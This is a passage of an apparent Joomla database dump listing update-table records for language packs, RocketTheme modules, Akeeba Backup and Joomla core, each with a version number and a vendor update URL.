Cyrillic','','pkg_sr-RS','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(23138,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(23139,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(23140,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(23141,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(23142,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(23143,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(23144,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(23145,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(23146,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(23147,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(23148,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(23149,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(23150,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(23151,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(23152,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(23153,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(23154,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(23155,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(23156,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(23157,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(23158,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(23159,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(23160,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(23161,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(23162,57,0,'French','','pkg_fr-FR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(23163,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(23164,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(23165,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(23166,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(23167,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(23168,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(23169,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(23170,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(23171,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(23172,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(23173,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(23174,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(23175,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(23176,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(23177,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(23178,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(23179,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(23180,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(23181,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.21.2','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(23182,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(23183,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(23184,57,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(23185,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(23186,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(23187,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(23188,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(23189,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(23190,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(23191,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(23192,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(23193,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(23194,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(23195,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(23196,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(23197,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(23198,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(23199,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(23200,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(23201,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(23202,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(23203,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(23204,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(23205,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(23206,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(23207,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(23208,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(23209,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.1.0','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeeba.com/download/fef/1-1-0.html',''),(23210,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.2FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(23211,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.6.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-2.html',''),(23212,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23213,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23214,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23215,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23216,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-1.html',''),(23217,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23218,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23219,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23220,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-1.html',''),(23221,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23222,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23223,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23224,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23225,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-2.html',''),(23226,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23227,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23228,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23229,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23230,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-2.html',''),(23231,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23232,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23233,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23234,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-2-1.html',''),(23235,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23236,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23237,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23238,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23239,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-2-1.html',''),(23240,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23241,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23242,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23243,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-2-1.html',''),(23244,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23245,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23246,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-2-1.html',''),(23247,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23248,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23249,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23250,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-2-1.html',''),(23251,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23252,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23253,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23254,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23255,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23256,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23257,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-2-1.html',''),(23258,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23259,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23260,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23261,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.3.2.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-3-2-1.html',''),(23262,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(23263,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(23264,3,0,'French','','pkg_fr-FR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(23265,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(23266,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(23267,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(23268,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(23269,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(23270,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(23271,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(23272,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(23273,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(23274,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.21.2','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(23275,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(23276,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(23277,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(23278,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(23279,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(23280,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(23281,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(23282,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(23283,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.21.2','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(23284,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(23285,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(23286,3,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(23287,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(23288,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(23289,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(23290,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(23291,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(23292,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(23293,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(23294,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(23295,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(23296,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(23297,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(23298,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(23299,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(23300,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(23301,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(23302,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(23303,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(23304,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(23305,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(23306,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(23307,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(23308,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(23309,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(23310,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(23311,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(23312,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(23313,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(23314,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(23315,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(23316,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(23317,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(23318,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(23319,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(23320,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(23321,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(23322,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(23323,57,0,'French','','pkg_fr-FR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(23324,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(23325,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(23326,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(23327,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(23328,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(23329,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(23330,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(23331,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(23332,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(23333,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.21.2','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(23334,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(23335,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(23336,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(23337,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(23338,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(23339,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(23340,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(23341,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(23342,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.21.2','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(23343,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(23344,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(23345,57,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(23346,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(23347,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(23348,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(23349,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(23350,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(23351,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(23352,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(23353,57,0,'Serbian 